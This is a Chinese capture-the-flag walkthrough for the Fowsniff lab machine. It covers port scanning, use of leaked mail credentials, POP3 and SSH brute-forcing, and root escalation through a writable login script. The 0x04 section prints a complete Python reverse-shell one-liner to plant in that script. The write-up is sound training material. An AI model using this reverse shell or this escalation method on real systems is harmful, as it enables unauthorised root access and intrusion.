Fowsniff CTF
Hack this machine and get the flag.
0x01 信息收集
先用Nmap工具对目标进行端口服务探测
![](https://i-blog.csdnimg.cn/blog_migrate/43194164f6527617020371617cce212c.png)
打开Web服务扫一遍目录没有发现有价值的线索。但分析端口应该突破口为110端口的邮箱服务。
![](https://i-blog.csdnimg.cn/blog_migrate/80827f72a4d427cac4a6fe42e6bdbbd6.png)
搜索一下名为fowsniff的公司,第一条为推特
![](https://i-blog.csdnimg.cn/blog_migrate/5e5d062fd31452aed3b1ad54b35f503e.png)
点进去能看到有个介绍说这个是靶场的一部分,随后贴了一个pastebin.com的链接。
![](https://i-blog.csdnimg.cn/blog_migrate/ac939dcf75a3dd88ddd5f705a6d17b8a.png)
跟随链接跳转可以访问到一个带有邮箱账号密码的文件
![](https://i-blog.csdnimg.cn/blog_migrate/2853aa7193d5ea282c42dd91714a1ec0.png)
0x02 POP3
把获得的账号及MD5解密后的密码用msf的pop3暴力破解模块尝试登录(手工试了前面两个都不行)
![](https://i-blog.csdnimg.cn/blog_migrate/b54a1a6b20af7b4dcf9f7358955ad05c.png)
设置配置选项
![](https://i-blog.csdnimg.cn/blog_migrate/085eeea873fb8dc846b60812278a30e8.png)
获得账号密码
![](https://i-blog.csdnimg.cn/blog_migrate/cb7f02187972c6d2572ebef1a3af56a0.png)
登录邮箱,list查看到存在两封邮件
![](https://i-blog.csdnimg.cn/blog_migrate/16d74ab6224046cbb9efd1f17d6d1841.png)
retr 1 读取第一封,里面有个临时密码S1ck3nBluff+secureshell。stone的吗?
![](https://i-blog.csdnimg.cn/blog_migrate/8cb164030b1ccb904c72339dc872bc74.png)
不管了,直接用hydra跑一遍,秒出结果,改密码对应的账号为baksteen
![](https://i-blog.csdnimg.cn/blog_migrate/e56643108144848838e32124aa85ef04.png)
0x03 提权
登录成功
![](https://i-blog.csdnimg.cn/blog_migrate/9ea1ab6ff9fc091f6ffc1cfce6e8acef.png)
到了提权环节,到处翻一翻找到一个cube.sh的文件,674权限users用户组可以写
![](https://i-blog.csdnimg.cn/blog_migrate/6deae3ee2162ca4bcc769e8efa0a2f27.png)
是个抬头的页面,感觉应该是这个了,在/etc目录下搜索调用该文件的程序。grep -r /opt/cube/cube.sh
![](https://i-blog.csdnimg.cn/blog_migrate/8d79643ad018f275a4620ffcd16a9d21.png)
每当用户登录时便会以root权限调用执行该文件
![](https://i-blog.csdnimg.cn/blog_migrate/a610f1befcf388d64d9f4a01ebfee7bb.png)
0x04 反弹回ROOT Shell
把python反弹shell的代码插入到cube.sh中,一旦用户登录便能弹回root的shell
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.250.203",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
![](https://i-blog.csdnimg.cn/blog_migrate/c88fe7609b81583eafd415ca06c75330.png)
退出重新登录一下,登录前要用nc监听弹回shell的端口
![](https://i-blog.csdnimg.cn/blog_migrate/c752918c4cb45176c401e997c8bfd75d.png)
成功弹回root权限的shell
![](https://i-blog.csdnimg.cn/blog_migrate/a7aa501854fbf59a1864973fcdb86efb.png)
获得flag
![](https://i-blog.csdnimg.cn/blog_migrate/64670966ccc9d9c76dac6e850cd95b95.png)